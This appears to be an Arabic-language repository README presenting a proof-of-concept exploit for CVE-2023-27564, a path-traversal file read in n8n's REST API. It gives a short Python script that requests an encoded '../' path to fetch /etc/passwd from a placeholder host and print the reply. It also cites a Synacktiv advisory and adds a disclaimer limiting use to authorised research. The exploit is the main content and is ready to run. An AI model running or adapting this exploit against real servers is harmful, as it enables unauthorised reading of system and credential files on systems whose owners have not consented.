
إثبات مفهوم لاستغلال CVE-2023-27564 يتيح قراءة الملفات بشكل مجهول في n8n عبر اجتياز المسار في REST API. مصمم لأغراض البحث الأمني وتقييم الثغرات.
تسمح هذه الثغرة بقراءة الملفات بشكل مجهول في n8n.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
إن إثبات المفهوم (PoC) المقدم في هذا المستودع مخصص للأغراض التعليمية والبحث الأمني فقط. يُقصد بالمعلومات والتعليمات البرمجية أن يستخدمها متخصصو الأمن السيبراني والباحثون لفهم الثغرات في البرمجيات والأنظمة والحماية منها. أي استخدام لهذا الإثبات أو المعلومات أو التعليمات البرمجية ذات الصلة لمهاجمة أهداف دون موافقة مسبقة متبادلة يعد غير قانوني وممنوع منعًا باتًا.
باستخدامك لهذا الإثبات، فإنك تقر بأنك تفهم التأثير المحتمل للثغرة التي يوضحها، وبأنك ستستخدمه بمسؤولية وأخلاقية. يخلي مؤلفو هذا الإثبات مسؤوليتهم عن أي إساءة استخدام لهذه المادة أو أي أضرار قد تنجم عن استخدام المعلومات والتعليمات البرمجية المقدمة. تقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والوطنية والدولية المعمول بها.
لقد بذل المؤلفون قصارى جهدهم لضمان دقة وموثوقية المعلومات المقدمة في هذا المستودع. ومع ذلك، تُقدَّم المعلومات "كما هي" دون أي ضمان من أي نوع. لا يتحمل المؤلفون أي مسؤولية أو تبعة عن دقة المعلومات الواردة أو محتواها أو اكتمالها أو قانونيتها أو موثوقيتها.